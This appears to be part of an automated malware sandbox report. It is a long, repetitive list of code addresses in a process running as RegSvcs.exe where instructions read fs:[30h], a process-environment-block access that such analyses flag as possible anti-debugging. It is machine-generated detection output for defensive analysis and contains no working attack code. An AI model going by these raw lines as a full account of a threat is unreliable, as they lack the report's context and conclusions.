Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F80283 mov eax, dword ptr fs:[00000030h]	19_2_00F80283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF826B mov eax, dword ptr fs:[00000030h]	19_2_00EF826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB0274 mov eax, dword ptr fs:[00000030h]	19_2_00FB0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F04260 mov eax, dword ptr fs:[00000030h]	19_2_00F04260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F04260 mov eax, dword ptr fs:[00000030h]	19_2_00F04260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F04260 mov eax, dword ptr fs:[00000030h]	19_2_00F04260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD625D mov eax, dword ptr fs:[00000030h]	19_2_00FD625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F06259 mov eax, dword ptr fs:[00000030h]	19_2_00F06259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBA250 mov eax, dword ptr fs:[00000030h]	19_2_00FBA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBA250 mov eax, dword ptr fs:[00000030h]	19_2_00FBA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F88243 mov eax, dword ptr fs:[00000030h]	19_2_00F88243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F88243 mov ecx, dword ptr fs:[00000030h]	19_2_00F88243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFA250 mov eax, dword ptr fs:[00000030h]	19_2_00EFA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF823B mov eax, dword ptr fs:[00000030h]	19_2_00EF823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E3F0 mov eax, dword ptr fs:[00000030h]	19_2_00F1E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E3F0 mov eax, dword ptr fs:[00000030h]	19_2_00F1E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E3F0 mov eax, dword ptr fs:[00000030h]	19_2_00F1E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F363FF mov eax, dword ptr fs:[00000030h]	19_2_00F363FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F103E9 mov eax, dword ptr fs:[00000030h]	19_2_00F103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE3DB mov eax, dword ptr fs:[00000030h]	19_2_00FAE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE3DB mov eax, dword ptr fs:[00000030h]	19_2_00FAE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE3DB mov ecx, dword ptr fs:[00000030h]	19_2_00FAE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FAE3DB mov eax, dword ptr fs:[00000030h]	19_2_00FAE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA43D4 mov eax, dword ptr fs:[00000030h]	19_2_00FA43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA43D4 mov eax, dword ptr fs:[00000030h]	19_2_00FA43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A3C0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]	19_2_00F083C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]	19_2_00F083C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]	19_2_00F083C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F083C0 mov eax, dword ptr fs:[00000030h]	19_2_00F083C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBC3CD mov eax, dword ptr fs:[00000030h]	19_2_00FBC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F863C0 mov eax, dword ptr fs:[00000030h]	19_2_00F863C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFE388 mov eax, dword ptr fs:[00000030h]	19_2_00EFE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFE388 mov eax, dword ptr fs:[00000030h]	19_2_00EFE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFE388 mov eax, dword ptr fs:[00000030h]	19_2_00EFE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF8397 mov eax, dword ptr fs:[00000030h]	19_2_00EF8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF8397 mov eax, dword ptr fs:[00000030h]	19_2_00EF8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF8397 mov eax, dword ptr fs:[00000030h]	19_2_00EF8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2438F mov eax, dword ptr fs:[00000030h]	19_2_00F2438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2438F mov eax, dword ptr fs:[00000030h]	19_2_00F2438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA437C mov eax, dword ptr fs:[00000030h]	19_2_00FA437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]	19_2_00F8035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]	19_2_00F8035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]	19_2_00F8035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8035C mov ecx, dword ptr fs:[00000030h]	19_2_00F8035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]	19_2_00F8035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8035C mov eax, dword ptr fs:[00000030h]	19_2_00F8035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA8350 mov ecx, dword ptr fs:[00000030h]	19_2_00FA8350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCA352 mov eax, dword ptr fs:[00000030h]	19_2_00FCA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F82349 mov eax, dword ptr fs:[00000030h]	19_2_00F82349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD634F mov eax, dword ptr fs:[00000030h]	19_2_00FD634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD8324 mov eax, dword ptr fs:[00000030h]	19_2_00FD8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD8324 mov ecx, dword ptr fs:[00000030h]	19_2_00FD8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD8324 mov eax, dword ptr fs:[00000030h]	19_2_00FD8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD8324 mov eax, dword ptr fs:[00000030h]	19_2_00FD8324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F20310 mov ecx, dword ptr fs:[00000030h]	19_2_00F20310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A30B mov eax, dword ptr fs:[00000030h]	19_2_00F3A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A30B mov eax, dword ptr fs:[00000030h]	19_2_00F3A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A30B mov eax, dword ptr fs:[00000030h]	19_2_00F3A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFC310 mov ecx, dword ptr fs:[00000030h]	19_2_00EFC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F004E5 mov ecx, dword ptr fs:[00000030h]	19_2_00F004E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F344B0 mov ecx, dword ptr fs:[00000030h]	19_2_00F344B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8A4B0 mov eax, dword ptr fs:[00000030h]	19_2_00F8A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F064AB mov eax, dword ptr fs:[00000030h]	19_2_00F064AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBA49A mov eax, dword ptr fs:[00000030h]	19_2_00FBA49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2A470 mov eax, dword ptr fs:[00000030h]	19_2_00F2A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2A470 mov eax, dword ptr fs:[00000030h]	19_2_00F2A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2A470 mov eax, dword ptr fs:[00000030h]	19_2_00F2A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8C460 mov ecx, dword ptr fs:[00000030h]	19_2_00F8C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2245A mov eax, dword ptr fs:[00000030h]	19_2_00F2245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FBA456 mov eax, dword ptr fs:[00000030h]	19_2_00FBA456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E443 mov eax, dword ptr fs:[00000030h]	19_2_00F3E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF645D mov eax, dword ptr fs:[00000030h]	19_2_00EF645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A430 mov eax, dword ptr fs:[00000030h]	19_2_00F3A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFC427 mov eax, dword ptr fs:[00000030h]	19_2_00EFC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFE420 mov eax, dword ptr fs:[00000030h]	19_2_00EFE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFE420 mov eax, dword ptr fs:[00000030h]	19_2_00EFE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EFE420 mov eax, dword ptr fs:[00000030h]	19_2_00EFE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]	19_2_00F86420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]	19_2_00F86420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]	19_2_00F86420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]	19_2_00F86420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]	19_2_00F86420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]	19_2_00F86420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F86420 mov eax, dword ptr fs:[00000030h]	19_2_00F86420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F38402 mov eax, dword ptr fs:[00000030h]	19_2_00F38402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F38402 mov eax, dword ptr fs:[00000030h]	19_2_00F38402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F38402 mov eax, dword ptr fs:[00000030h]	19_2_00F38402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F025E0 mov eax, dword ptr fs:[00000030h]	19_2_00F025E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E5E7 mov eax, dword ptr fs:[00000030h]	19_2_00F2E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C5ED mov eax, dword ptr fs:[00000030h]	19_2_00F3C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C5ED mov eax, dword ptr fs:[00000030h]	19_2_00F3C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F065D0 mov eax, dword ptr fs:[00000030h]	19_2_00F065D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A5D0 mov eax, dword ptr fs:[00000030h]	19_2_00F3A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A5D0 mov eax, dword ptr fs:[00000030h]	19_2_00F3A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E5CF mov eax, dword ptr fs:[00000030h]	19_2_00F3E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E5CF mov eax, dword ptr fs:[00000030h]	19_2_00F3E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F245B1 mov eax, dword ptr fs:[00000030h]	19_2_00F245B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F245B1 mov eax, dword ptr fs:[00000030h]	19_2_00F245B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F805A7 mov eax, dword ptr fs:[00000030h]	19_2_00F805A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F805A7 mov eax, dword ptr fs:[00000030h]	19_2_00F805A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F805A7 mov eax, dword ptr fs:[00000030h]	19_2_00F805A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3E59C mov eax, dword ptr fs:[00000030h]	19_2_00F3E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F02582 mov eax, dword ptr fs:[00000030h]	19_2_00F02582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F02582 mov ecx, dword ptr fs:[00000030h]	19_2_00F02582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F34588 mov eax, dword ptr fs:[00000030h]	19_2_00F34588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3656A mov eax, dword ptr fs:[00000030h]	19_2_00F3656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3656A mov eax, dword ptr fs:[00000030h]	19_2_00F3656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3656A mov eax, dword ptr fs:[00000030h]	19_2_00F3656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08550 mov eax, dword ptr fs:[00000030h]	19_2_00F08550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08550 mov eax, dword ptr fs:[00000030h]	19_2_00F08550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]	19_2_00F10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]	19_2_00F10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]	19_2_00F10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]	19_2_00F10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]	19_2_00F10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10535 mov eax, dword ptr fs:[00000030h]	19_2_00F10535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]	19_2_00F2E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]	19_2_00F2E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]	19_2_00F2E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]	19_2_00F2E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E53E mov eax, dword ptr fs:[00000030h]	19_2_00F2E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F96500 mov eax, dword ptr fs:[00000030h]	19_2_00F96500
